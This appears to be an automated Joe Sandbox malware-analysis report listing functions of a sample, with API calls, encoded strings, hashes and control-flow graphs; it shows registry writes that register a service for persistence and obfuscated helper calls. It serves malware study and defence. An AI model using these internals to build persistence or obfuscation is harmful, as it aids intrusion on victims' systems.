                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 25ae689700889fa29d26451f1a45b5d999c73f229e9407cea67a74bd606d0a64
                                                                                  • Instruction ID: 5db02bd6896edb29ab10b4c9562ea57d70d04f65371fa743341094fd044463ec
                                                                                  • Opcode Fuzzy Hash: 25ae689700889fa29d26451f1a45b5d999c73f229e9407cea67a74bd606d0a64
                                                                                  • Instruction Fuzzy Hash: 3FF0DA75215108EB8B08CF98E844CAB77B9EB4C710B50C52DFD1A97250D630E951DBA5
                                                                                  Function 00443AA3 Relevance: 3.0, APIs: 2, Instructions: 29nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00443ACC
                                                                                  • CallWindowProcA.USER32(?,?,?,?,?,?), ref: 00443AE2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallNtdllProcProc_
                                                                                  • String ID:
                                                                                  • API String ID: 1646280189-0
                                                                                  • Opcode ID: ee61ddea2b75e3f4823a3ccf2abc6a93d77ab4a9ab6fa54372e171327f678c75
                                                                                  • Instruction ID: 1acda1ddea48ef109b347bd164c7e2f53ce05c80924e795e3fa0d44f99ed6bce
                                                                                  • Opcode Fuzzy Hash: ee61ddea2b75e3f4823a3ccf2abc6a93d77ab4a9ab6fa54372e171327f678c75
                                                                                  • Instruction Fuzzy Hash: 3AF08C36100209FFDF118F94CC00CAB7BBAFF08750B048429FA8896520DB32E920EB40
                                                                                  Function 00447FB3 Relevance: 2.0, APIs: 1, Instructions: 452COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID:
                                                                                  • API String ID: 431132790-0
                                                                                  • Opcode ID: 95371596a73a817719f03bca6aec6a4782213963eb444d1f5a1f3e2c92534f4d
                                                                                  • Instruction ID: f5b7da0595c2aca246db7368801a3354d9bddcaf90c5ea8caecb0982ab0d697a
                                                                                  • Opcode Fuzzy Hash: 95371596a73a817719f03bca6aec6a4782213963eb444d1f5a1f3e2c92534f4d
                                                                                  • Instruction Fuzzy Hash: 49F16E70500219EFEF14DF65C880ABF7BA9AF04715F10851FF8159B292DB39DA02DB69
                                                                                  Function 00446798 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3321689350b0681a1eb206609727c63704c3073d8068890cd09e9e4c922eb4fc
                                                                                  • Instruction ID: b58a4138a4b3cd111c0ffed0e881446eeca8070bfdd58c7a2380f36fdb0f6f80
                                                                                  • Opcode Fuzzy Hash: 3321689350b0681a1eb206609727c63704c3073d8068890cd09e9e4c922eb4fc
                                                                                  • Instruction Fuzzy Hash: BCF08C32000128FBAF125F919C04DEF3B29AF0A368F028817FA1591020C739C921EBAB
                                                                                  Function 0041C540 Relevance: .4, Instructions: 395COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f94e77cf206d1fde31662005d8e52cd5c253e0d1886b5e57a84eddf7a16b81d
                                                                                  • Instruction ID: 870d24a2b2f4d7810d6371cbce4dd510c0059bfe67cb112ca9cbb6b63e9b83af
                                                                                  • Opcode Fuzzy Hash: 4f94e77cf206d1fde31662005d8e52cd5c253e0d1886b5e57a84eddf7a16b81d
                                                                                  • Instruction Fuzzy Hash: AE12B474D00228DFDB24DF94C994BDEBBB1BB88300F20829AD909AB385D7745E85CF94
                                                                                  Function 00405330 Relevance: 133.7, APIs: 44, Strings: 32, Instructions: 725COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 405330-4053ad call 404f50 call 449e19 call 407510 call 449e19 call 407510 call 449e19 call 407510 call 449e19 call 407510 call 449e19 call 407510 23 4053b8-4053c5 _strlen 0->23 24 4053af-4053b6 0->24 25 4053c8-4053e0 call 404740 23->25 24->25 28 4053e2-4053e9 25->28 29 4053eb-4053f8 _strlen 25->29 30 4053fb-40542d call 404740 28->30 29->30 33 405438-405445 _strlen 30->33 34 40542f-405436 30->34 35 405448-405462 call 404740 33->35 34->35 38 405464-40546b 35->38 39 40546d-40547a _strlen 35->39 40 40547d-405495 call 404740 38->40 39->40 43 4054a0-4054ad _strlen 40->43 44 405497-40549e 40->44 45 4054b0-4054c8 call 404740 43->45 44->45 48 4054d3-4054e0 _strlen 45->48 49 4054ca-4054d1 45->49 50 4054e3-4054fd call 404740 48->50 49->50 53 405508-405515 _strlen 50->53 54 4054ff-405506 50->54 55 405518-405532 call 4068a0 53->55 54->55 58 405534-40553b 55->58 59 40553d-40554a _strlen 55->59 60 40554d-405567 call 4068a0 58->60 59->60 63 405572-40557f _strlen 60->63 64 405569-405570 60->64 65 405582-40559c call 4068a0 63->65 64->65 68 4055a7-4055b4 _strlen 65->68 69 40559e-4055a5 65->69 70 4055b7-4055d1 call 4068a0 68->70 69->70 73 4055d3-4055da 70->73 74 4055dc-4055e9 _strlen 70->74 75 4055ec-405606 call 4068a0 73->75 74->75 78 405611-40561e _strlen 75->78 79 405608-40560f 75->79 80 405621-40563b call 4068a0 78->80 79->80 83 405649-405656 _strlen 80->83 84 40563d-405647 80->84 85 40565c-405679 call 4068a0 83->85 84->85 88 405687-405694 _strlen 85->88 89 40567b-405685 85->89 90 40569a-4056b7 call 4068a0 88->90 89->90 93 4056c5-4056d2 _strlen 90->93 94 4056b9-4056c3 90->94 95 4056d8-4056f5 call 404740 93->95 94->95 98 405703-405710 _strlen 95->98 99 4056f7-405701 95->99 100 405716-405731 call 404740 98->100 99->100 103 405733-40573d 100->103 104 40573f-40574c _strlen 100->104 105 405752-40576d call 4068a0 103->105 104->105 108 40577b-405788 _strlen 105->108 109 40576f-405779 105->109 110 40578e-4057a9 call 4068a0 108->110 109->110 113 4057b7-4057c4 _strlen 110->113 114 4057ab-4057b5 110->114 115 4057ca-4057e5 call 4068a0 113->115 114->115 118 4057f3-405800 _strlen 115->118 119 4057e7-4057f1 115->119 120 405806-405821 call 4068a0 118->120 119->120 123 405823-40582d 120->123 124 40582f-40583c _strlen 120->124 125 405842-40585d call 4068a0 123->125 124->125 128 40586b-405878 _strlen 125->128 129 40585f-405869 125->129 130 40587e-405899 call 4068a0 128->130 129->130 133 4058a7-4058b4 _strlen 130->133 134 40589b-4058a5 130->134 135 4058ba-4058d5 call 4068a0 133->135 134->135 138 4058e3-4058f0 _strlen 135->138 139 4058d7-4058e1 135->139 140 4058f6-405911 call 4068a0 138->140 139->140 143 405913-40591d 140->143 144 40591f-40592c _strlen 140->144 145 405932-40594d call 4068a0 143->145 144->145 148 40595b-405968 _strlen 145->148 149 40594f-405959 145->149 150 40596e-405989 call 4068a0 148->150 149->150 153 405997-4059a4 _strlen 150->153 154 40598b-405995 150->154 155 4059aa-4059c5 call 4068a0 153->155 154->155 158 4059d3-4059e0 _strlen 155->158 159 4059c7-4059d1 155->159 160 4059e6-405a01 call 4068a0 158->160 159->160 163 405a03-405a0d 160->163 164 405a0f-405a1c _strlen 160->164 165 405a22-405a3d call 4068a0 163->165 164->165 168 405a4b-405a58 _strlen 165->168 169 405a3f-405a49 165->169 170 405a5e-405a79 call 4068a0 168->170 169->170 173 405a87-405a94 _strlen 170->173 174 405a7b-405a85 170->174 175 405a9a-405ab5 call 4068a0 173->175 174->175 178 405ac3-405ad0 _strlen 175->178 179 405ab7-405ac1 175->179 180 405ad6-405af1 call 4068a0 178->180 179->180 183 405af3-405afd 180->183 184 405aff-405b0c _strlen 180->184 185 405b12-405b2d call 4068a0 183->185 184->185 188 405b3b-405b48 _strlen 185->188 189 405b2f-405b39 185->189 190 405b4e-405b69 call 4068a0 188->190 189->190 193 405b77-405b84 _strlen 190->193 194 405b6b-405b75 190->194 195 405b8a-405ba5 call 4068a0 193->195 194->195 198 405bb3-405bc0 _strlen 195->198 199 405ba7-405bb1 195->199 200 405bc6-405be1 call 4068a0 198->200 199->200 203 405be3-405bed 200->203 204 405bef-405bfc _strlen 200->204 205 405c02-405c1d call 4068a0 203->205 204->205 208 405c2b-405c38 _strlen 205->208 209 405c1f-405c29 205->209 210 405c3e-405d05 call 4068a0 ks_setLicense ks_setExtVal call 4043f0 * 2 call 404d10 call 4042c0 call 404700 208->210 209->210 223 405d15-405d87 call 4043f0 * 2 call 404d10 call 4043f0 * 2 call 404d10 210->223 224 405d07-405d10 210->224 251 405db1-405dce 223->251 252 405d89-405dae call 404280 _strncpy 223->252 225 405e08-405e27 ks_GetData 224->225 228 405e35-405e44 _strlen 225->228 229 405e29-405e33 225->229 231 405e4a-405e95 call 404740 call 404700 * 5 228->231 229->231 254 405dd0-405df5 call 404280 _strncpy 251->254 255 405df8-405e03 call 404700 * 2 251->255 252->251 254->255 255->225
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_strncpyks_set$DataLicensePrivateProfileString_memcpy_s_memset
                                                                                  • String ID: 07328772bec783adedca0070972a0adcded8bf12a87b82263617ca94ca2eb6b7fdc6860184e49dfe495a731e479da9a4c41d$0aa072ae6fce7ede9171168b1e35fc7d76f14af922c891806138f801ec88f82d6daf34cf1ebe7945aad83982208f26e48a83$0ntNdj/aZGqOkbsjE+J5NyHG4hVg2ck9B+ioEU/oLxt9z6zhHySwqsVTAULFNDC/osCrgqCtHk5LFFK6$3164e14c9d421e976e3202f18d7a705ca32aea97f9b1566596d0a5829fe077e5c99aa2b398b241d5de4cd74954157d7cf383$3b0e4641e034a569748deca5c9b3df5a2b75e14041413481d09ffb16d4da79b4e0fbe607b47944383f7fc37c7da74c6a4d3a$4VBthGOalOGezbqH3Ke4C/pl9koUp/Q4OCABhn/EL2FzPc2BuK56eFEsvh5NscgiQP8+UCOX6WhyulFx$501XfFJZtEaJ6q6KmM5SeYb3ADXGjZ0eXjyzwWvHOGuT3L7Bg6QYCa8S84qGPKqIDBCMxZ4flvbzLlAg$64c909cfe4d7895b40534d37f0589810302a9b06bbbae0315947c8f0157be991bba67abe38556e15904c562d6d77b49c3a89$6T4siGu8JCVqvJg5vvX6SdaozyN/GAmF6+RZ5iV1EC97uA4gC3/eB1VmYqJPuq4l3C7Ts0nu8y487mj2$7AIIqqKK+3Z8uFPJrFUve9pkvl0lJQVSYkkucqtPizNTxDr7NTBIIvmmRcSWdauLN8TSUVBN4U1L0NPE$83367a5c965c70b81f3f7e6a525c8161cac96c8a4e1cf3f1ce9d05a831708f45415540c7c457b0fe6cffebbefc0c20825a45$AFhD658fA9uRMnb6kduQ85Az$AQJ1iKFmWWMVWbhOqMh9WKNB0OAAXpcb2Wu325xpM9/nDMV/FUn4VT1zkXJFDR/jpouQOhjwv5qcy2lK$BMxqtolupbMZfgrVR0otWPJyogBsNlfN6zwEae5exM5l1T8U+CURd8+8Nf45qRkKJ7/h1gFPw3EJPoue$BXNHQiZ+B6pBT9BAkXpXuwq+Wf5/3VQ1ittJZ2RMgnBcgHIdhvV9Dd677bs321nyAhsT5hvvxI43PsXe$C:\Users\user\Desktop\CFA702\D2EDCA7E\C8C6753\D74384.ini$EGk64TLkCdM62szhHWJSKSyAN/W0aeQoJwqx731f2dcKApXJ51l9jTUtnF4ac/CXHh1sI1Q+lzM5xotY$F3vxgjhzlyt+FDltR7tRLyukp5A+Mqr/mAs2Y4nF6EEBdwUnDwAHuuOwo9jAQH4JdKxZ9Pe9jqI2nz3n$KBrW+g83ikZwMVeCYlKanLeeDDuBxXgOc5C7WjgiSBe2uO33W5L4HGg2FLtRGQjj5JqS4n0yZPNUDDNA$KoRRE8cQt9Tr87pGb/+EpFv112w=$M/p0PnYuJ1sklDgSXDbgCx3kQxF+6a8ltoGzySfGm8Uz5h0+Xs3qIn8kyWLEwT5j+AxNplGn/ZQPwXHy$S81DHBOFXAtOopCTTymyU6eHrRxlKLjTYyY88gwg4yR+5QASfWzI5GGFipj+fjWp8cPRPNXNMroIinZm$T8Wsd6pb26L8L+WvsoCQYLMr3WuGSgooE1AMqVTHSrFWYWpn+h7BxafMQfmFWoLz/q7YHhyZ+nRrlLLQ$UpLkoBxj2c3RqU8IGLinqJbXLmdKlpdJfWfg7kxm81Ct6a2i/pqiM5VlBfHtPr5lQ5v1VEtKQjPPIt7j$WGMzAij0BnIDtT3/uvwXIm+0AM9+kyGeyCZeUAZT0jvGZY/d8EWfYR4/HEpeIE848Xj2eMJeMyepFmDt$a08078fdd1b8ee251a2336bd2b711d05d37c9f6d33cc094fcfed4e00ec4339f70a48830018a644fc7cdd6524c42cdbf17f55$ad037f0e8d493ca45f9127cc1d4903821844255c204e194127e8ecf7e2c67f0bb10229f4667d1c3d59e1a93993bea1da8723$asDGH6anCrvdLwP1Mewi+HcOOSIdWA8SyM1GGd7AL2x/A3Hu1DMiawa1Ae+o4j3w988xiphDAinT+qsp$kOWXhifzg63RL6P0j+k2jO7rXp/0nZDqcmWgGo8Jgc5VGMA24JosN3s9/z0mWo7WyFHMPqlgdny35p4j$qG3069QzRf76mWFRP7BTzajbBgErgrW/v2fAclr6wZ7g8pmVHtkzDg+39t5dtHOEkPwt14rl9ZNgrZO6$vTHRmHdD18deM6PJKCOzBD4hYrXZ2KIMktaWmDeVuBa2PbgH6i/xsHB0fYFJ55/udx6kk18mfsyKEytr$wQf56+iPiWq0fD7ox38a0kLlSWpKeQSi22/otMleqUjTnfhO/yuNJdTDhT01AfRuPXh8yQi6T3bWmbL3
                                                                                  • API String ID: 2155493056-765598262
                                                                                  • Opcode ID: b3a6fbd18f382a5038def3076b72c7004ec26da9cd6f6e5ab41ffa114afa6eb0
                                                                                  • Instruction ID: 507b917843f7274eb67824c832b67a7afa611ab75f5494a7a22c77a93f9ef16a
                                                                                  • Opcode Fuzzy Hash: b3a6fbd18f382a5038def3076b72c7004ec26da9cd6f6e5ab41ffa114afa6eb0
                                                                                  • Instruction Fuzzy Hash: A1527FB1E142089BEB14FF51DC52BAE7275EB54308F20847FE50A76282EB7C9944CF5A
                                                                                  Function 6A6E1330 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 160registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E1361
                                                                                  • RegOpenKeyA.ADVAPI32(80000002,?), ref: 6A6E1377
                                                                                  • RegCreateKeyA.ADVAPI32(80000002,?,00000000), ref: 6A6E138F
                                                                                  • RegCloseKey.ADVAPI32 ref: 6A6E139D
                                                                                  • RegSetValueExA.KERNELBASE ref: 6A6E13DD
                                                                                  • RegSetValueExA.KERNELBASE(?,ErrorControl,00000000,00000004,00000004,00000004), ref: 6A6E1404
                                                                                  • RegSetValueExA.KERNELBASE(?,Start,00000000,00000004,00000004,00000004), ref: 6A6E1427
                                                                                  • RegSetValueExA.KERNELBASE(?,DisplayName,00000000,00000002,?,?), ref: 6A6E144F
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6E145A
                                                                                  • RegSetValueExA.KERNELBASE(?,ImagePath,00000000,00000002,?,?), ref: 6A6E1499
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6E14A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Close$CreateOpen_sprintf
                                                                                  • String ID: DisplayName$ErrorControl$Group$ImagePath$NDIS$Start$System\CurrentControlSet\Services\%s$Type
                                                                                  • API String ID: 440001231-2780834881
                                                                                  • Opcode ID: ca3ee53195914334e89791487664f40c44aa4cd50cc016789174810206762a47
                                                                                  • Instruction ID: 2e946ee28a4ab3a9a56e3f1f37a11b3632c62c75bff6445a454ff4bcb18f7015
                                                                                  • Opcode Fuzzy Hash: ca3ee53195914334e89791487664f40c44aa4cd50cc016789174810206762a47
                                                                                  • Instruction Fuzzy Hash: A85175B5608300BBE720DB64CC49FABB7E9AB88704F40891DB659D71C1EE74D904DB62
                                                                                  Function 00409BF0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 280COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 295 409bf0-409c0f call 408640 298 409c11-409c19 IWBE 295->298 299 409c34-409c3b 295->299 298->299 300 409c1b-409c2f 298->300 301 409c60-409c7b call 44b132 299->301 302 409c3d-409c45 IHJDE 299->302 303 40a0e1-40a0ee call 469914 300->303 309 409ca1-409ca8 301->309 310 409c7d-409c86 INSHDY 301->310 302->301 304 409c47-409c5b 302->304 304->303 312 409caa-409cb1 309->312 313 409cbc-409cd0 309->313 310->309 311 409c88-409c9c 310->311 311->303 312->313 314 409cb3-409cba 312->314 313->303 314->313 315 409cd5-409cf0 call 409b20 call 40be40 314->315 320 409cf2-409d41 315->320 321 409d46-409d4d call 40be00 315->321 322 409de1-409f14 _memset * 3 call 40b090 call 46b0a0 call 40be40 320->322 325 409d92-409ddb 321->325 326 409d4f-409d90 321->326 334 409f42-409f6a 322->334 335 409f16-409f40 322->335 325->322 326->322 338 409f6c-409fab call 40a8d0 INSHD 334->338 335->338 341 409fb1-409fbc 338->341 342 40a077-40a0de _memset * 2 GSDNP call 409a80 338->342 346 409fc2-409fc9 341->346 347 40a075 341->347 342->303 346->347 349 409fcf-409fd6 346->349 347->303 349->347 350 409fdc-40a03b _memset * 2 GSDNP call 40bb20 349->350 353 40a04a-40a060 call 40a8d0 350->353 354 40a03d-40a049 350->354 357 40a065-40a06f HINSD 353->357 354->353 357->347
                                                                                  APIs
                                                                                  • IWBE.A2F0JLEKS ref: 00409C11
                                                                                  • IHJDE.A2F0JLEKS ref: 00409C3D
                                                                                  • INSHDY.A2F0JLEKS(Function_00008B20,00000000,00000000,00000000,00000000,00000000), ref: 00409C7D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: SysWOW64$loser$loser32$loser64$s$system32$y
                                                                                  • API String ID: 0-4153563467
                                                                                  • Opcode ID: 3dedaa603fdf3090f368fdba66691516e530f15f89106bf06b9d5baa25b54bc1
                                                                                  • Instruction ID: a116d238729e3860eb343d64fc62387cb49321a942347d31f859cfb2a01973d8
                                                                                  • Opcode Fuzzy Hash: 3dedaa603fdf3090f368fdba66691516e530f15f89106bf06b9d5baa25b54bc1
                                                                                  • Instruction Fuzzy Hash: 9CD17370C082589AEB21DB24DC49BDD7BB8AB15708F0401EED548662D2D7BD5FC8CF6A
                                                                                  Function 6A6EF58B Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6A6EF595
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,6A6EF85C,?,?), ref: 6A6EF5C5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6A6EF5D9
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF615
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF623
                                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6A6EF640
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF66B
                                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6A6EF674
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 6A6EF68D
                                                                                  • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_0001EDDC,?), ref: 6A6EF6AA
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF6DD
                                                                                  • ConvertDefaultLocale.KERNEL32(00000000), ref: 6A6EF6E6
                                                                                  • GetModuleFileNameA.KERNEL32(6A6D0000,?,00000105), ref: 6A6EF729
                                                                                  • _memset.LIBCMT ref: 6A6EF749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                  • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                  • API String ID: 3537336938-2299501126
                                                                                  • Opcode ID: 2d3bdeea502fa68b5dfbe76a6d8aeb289de6064730eb6543b69ecf7bf84e04a9
                                                                                  • Instruction ID: bd4ddfeff5bfdd7641bcfb2f1dc9955c71ded2dcee33b90c965d629eb2c1d534
                                                                                  • Opcode Fuzzy Hash: 2d3bdeea502fa68b5dfbe76a6d8aeb289de6064730eb6543b69ecf7bf84e04a9
                                                                                  • Instruction Fuzzy Hash: 075146B1D052289BCB65DF65DC44BEDBAF4AF49304F1141EAE958E3280DB748E85CFA0
                                                                                  Function 6A6E28A0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 164networkfileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__strlwr$CleanupCloseCreateFileHandleStartup_sprintfgethostname
                                                                                  • String ID: \\.\%s
                                                                                  • API String ID: 2340954306-869905501
                                                                                  • Opcode ID: 1671453f68bed37b371663418db31414ae41cb5666d4f14943dc7d785e614ef4
                                                                                  • Instruction ID: eeecf72eefaa56a3390417bf2e1cde818c65679b3060eb8dc991bada4495a270
                                                                                  • Opcode Fuzzy Hash: 1671453f68bed37b371663418db31414ae41cb5666d4f14943dc7d785e614ef4
                                                                                  • Instruction Fuzzy Hash: 5851D6B25093806FE230D764DC99EDB77EDAB95308F040A69F599C7182FF745A0C86A2
                                                                                  Function 00402A72 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 99COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

